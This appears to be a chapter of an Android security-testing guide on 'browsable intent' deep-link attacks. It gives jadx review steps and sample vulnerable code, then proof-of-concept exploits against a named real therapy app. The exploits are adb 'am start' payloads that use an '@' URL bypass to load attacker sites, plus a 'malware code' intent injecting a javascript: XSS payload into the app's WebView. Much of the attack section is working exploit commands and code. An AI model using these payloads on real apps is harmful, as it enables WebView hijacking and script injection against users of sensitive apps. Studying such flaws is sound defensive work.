5. Browsable Intent attack

Methods to find a bug

Rough Note : 

1. To trigger deeplink we use browsable
2. Manifest -> Browsable trigger app using link
3. search for exported=true or intent filter in manifestfile
4. search for browsable 
5. check for deeplink
6. go to activity
7. check for method accept data from intent like oncreate(), onResume() etc
8. search for loadurl() using intent function
9. conform it load activity using browsable intent

Steps :-
		1) Open jadx and open the application
		2) Now open androisManifest.xml file
		3) Search for "android.intent.category.BROWSABLE"
		4) Check for deep links (android:scheme,android:host)
		5) Check these methods wether its accepting any data from intent ( onCreate() , onResume() , onRestart() , onBackpress() and more )
		6) Now search for loadUrl();
		7) Now check the loadUrl() accepting any data direct from intent
		8) if yes then its exploitable : )

	Sample vulnerable code :-

		package name :- com.example.mobile

		AndroidManifest.xml :-

			 <activity android:name="com.example.mobile.MainActivity" >
           			 <intent-filter>
               				 <action android:name="android.intent.action.VIEW"/>
               				 <category android:name="android.intent.category.DEFAULT"/>
               				 <category android:name="android.intent.category.BROWSABLE"/>
               				 <data android:scheme="example"/>
					 <data android:scheme="example" android:host="auth.example.com">
					 <data android:scheme="example" android:host="auth.example.com" android:pathPrefix="/android/">
           			 </intent-filter>
			 </activity>

		Activity.java :-

				 public void onCreate(Bundle bundle)
					{
					        Intent data = new Intent();
						String url  = data.getDataString();
						WebView w = (WebView) findViewById(R.id.web);
						w.loadUrl(url);
					}

url = https://www.google.com/index.html

scheme = https
host = google.com
path = /

PoC 1

Live Attack :-

App name = Faithful Counseling - Christian Based Therapy
Version Code = 1.65
package name = com.faithfulcounseling
Target Bug Name :- Browsable Intent Attack
Android Scheme = http , https , betterhelpapp , faithfulcounselingapp
Android host = www.faithfulcounseling.com , www.faithfulcounseling.com , betterhelp

payload = http://www.faithfulcounseling.com , https://www.faithfulcounseling.com , betterhelpapp://betterhelp

test Exploit adb payload :- am start -n com.faithfulcounseling/com.betterhelp.MainActivity -d "betterhelpapp://betterhelp"

Exploit adb payload 1:- am start -n com.faithfulcounseling/com.betterhelp.MainActivity -d "http://[email protected]"
Exploit adb payload 2:- am start -n com.faithfulcounseling/com.betterhelp.MainActivity -d "https://[email protected]"

Manifest code :-

<activity android:name="com.betterhelp.MainActivity" android:launchMode="singleTask" android:screenOrientation="portrait">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
            <intent-filter>
                <data android:scheme="http" android:host="www.faithfulcounseling.com"/>
                <data android:scheme="https" android:host="www.faithfulcounseling.com"/>
                <data android:scheme="betterhelpapp" android:host="betterhelp"/>
                <action android:name="android.intent.action.VIEW"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <category android:name="android.intent.category.BROWSABLE"/>
            </intent-filter>
        </activity>


Example :-   if (!scheme.equals("http") && !scheme.equals("https"))  { not http or not https condition true}

Example :=   else if (!dataString.startsWith("http://www.faithfulcounseling.com") && !dataString.startsWith("https://www.faithfulcounseling.com")) { not http://www.faithfulcounseling.com or not https://www.faithfulcounseling.com condition true }


java code :-


                if (scheme != null && (scheme.equals("http") || scheme.equals("https") || scheme.equals("faithfulcounselingapp"))) { // true


                    String dataString = intent.getDataString(); // assig
                    dataString= "http://www.faithfulcounseling.com"

                    dataString = "http://www.hacker.com"


                    if (!scheme.equals("http") && !scheme.equals("https")) { // false

/// not working condition

                        if (dataString.endsWith(Constants.URL_PATH_DELIMITER)) {
                            dataString = dataString.substring(0, dataString.length() - 1);
                        }
                        if (dataString.endsWith("faithfulcounseling")) {
                            dataString = "https://www.faithfulcounseling.com/";
                        } else {
                            dataString = "https://www.faithfulcounseling.com" + dataString.substring(dataString.lastIndexOf(Constants.URL_PATH_DELIMITER));
                        }
                        this.f2064d = dataString;
                    }

/// not working condition


                    dataString = "http://www.faithfulcounseling.com"
                    dataString = "https://cappriciosec.com"

/// not working condition
                     else if (!dataString.startsWith("http://www.faithfulcounseling.com") && !dataString.startsWith("https://www.faithfulcounseling.com")) {





                        this.a.loadUrl("https://www.faithfulcounseling.com");
                        setIntent(null);
                    }


/// not working condition
                    this.a.loadUrl(dataString); // vulnearble part
                    setIntent(null);





                if (this.a.getUrl() != null && !this.a.getUrl().contains("livechat") && !this.a.getUrl().contains("worksheet") && !this.a.getUrl().contains("verify") && !this.a.getUrl().contains("start")) {
                    if (System.currentTimeMillis() - getSharedPreferences("pin", 0).getLong("show_pin", 0) > 600000) {
                        CookieManager.getInstance().setCookie("https://www.faithfulcounseling.com", "client_ms=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT;");
                    }
                }
                com.facebook.d0.g.g(this);
                this.a.loadUrl("javascript:reconnectSocket();");
                this.a.onResume();
                this.a.resumeTimers();
            }

PoC 2

Bug Name : Browsable Intent attack


Description:-

Browsable api allow use to open app via clicking deep link Web view allows users to view web app or site in mobile application if the url is hardcorded then its realy secured or
 if application accepting data from intent the developer must implement some check using if else block other wise it can exploited

Steps to reproduce via adb:-
1) Connect mobile via adb using adb connect command
2) Now type adb shell
3) Now type am start -n com.faithfulcounseling/com.betterhelp.MainActivity  -d -d "betterhelpapp://betterhelp"
4) Exploited

Exploit adb payload :- am start -n com.faithfulcounseling/com.betterhelp.MainActivity -d "https://[email protected]"

Vulnerable code :-


Manifest code :-

<activity android:name="com.betterhelp.MainActivity" android:launchMode="singleTask" android:screenOrientation="portrait">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
            <intent-filter>
                <data android:scheme="http" android:host="www.faithfulcounseling.com"/>
                <data android:scheme="https" android:host="www.faithfulcounseling.com"/>
                <data android:scheme="betterhelpapp" android:host="betterhelp"/>
                <action android:name="android.intent.action.VIEW"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <category android:name="android.intent.category.BROWSABLE"/>
            </intent-filter>
        </activity>


Example :-   if (!scheme.equals("http") && !scheme.equals("https"))  { not http or not https condition true}

Example :=   else if (!dataString.startsWith("http://www.faithfulcounseling.com") && !dataString.startsWith("https://www.faithfulcounseling.com")) { not http://www.faithfulcounseling.com or not https://www.faithfulcounseling.com condition true }


java code :-


                if (scheme != null && (scheme.equals("http") || scheme.equals("https") || scheme.equals("faithfulcounselingapp"))) { // true


                    String dataString = intent.getDataString(); // assig
                    dataString= "http://www.faithfulcounseling.com"

                    dataString = "http://www.hacker.com"


                    if (!scheme.equals("http") && !scheme.equals("https")) { // false

/// not working condition

                        if (dataString.endsWith(Constants.URL_PATH_DELIMITER)) {
                            dataString = dataString.substring(0, dataString.length() - 1);
                        }
                        if (dataString.endsWith("faithfulcounseling")) {
                            dataString = "https://www.faithfulcounseling.com/";
                        } else {
                            dataString = "https://www.faithfulcounseling.com" + dataString.substring(dataString.lastIndexOf(Constants.URL_PATH_DELIMITER));
                        }
                        this.f2064d = dataString;
                    }

/// not working condition


                    dataString = "http://www.faithfulcounseling.com"
                    dataString = "https://cappriciosec.com"

/// not working condition
                     else if (!dataString.startsWith("http://www.faithfulcounseling.com") && !dataString.startsWith("https://www.faithfulcounseling.com")) {





                        this.a.loadUrl("https://www.faithfulcounseling.com");
                        setIntent(null);
                    }


/// not working condition
                    this.a.loadUrl(dataString); // vulnearble part i used @ to bypass this security
                    setIntent(null);





                if (this.a.getUrl() != null && !this.a.getUrl().contains("livechat") && !this.a.getUrl().contains("worksheet") && !this.a.getUrl().contains("verify") && !this.a.getUrl().contains("start")) {
                    if (System.currentTimeMillis() - getSharedPreferences("pin", 0).getLong("show_pin", 0) > 600000) {
                        CookieManager.getInstance().setCookie("https://www.faithfulcounseling.com", "client_ms=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT;");
                    }
                }
                com.facebook.d0.g.g(this);
                this.a.loadUrl("javascript:reconnectSocket();");
                this.a.onResume();
                this.a.resumeTimers();
            }


malware code :-

      Intent exploit = new Intent();
       exploit.setClassName("com.faithfulcounseling","com.betterhelp.MainActivity");
       exploit.setData(Uri.parse("https://www.faithfulcounseling.com@javascript:prompt('xss')"));
       startActivity(exploit);

Previous4. Insecure Web view Next6. Exported Activity

Last updated 1 year ago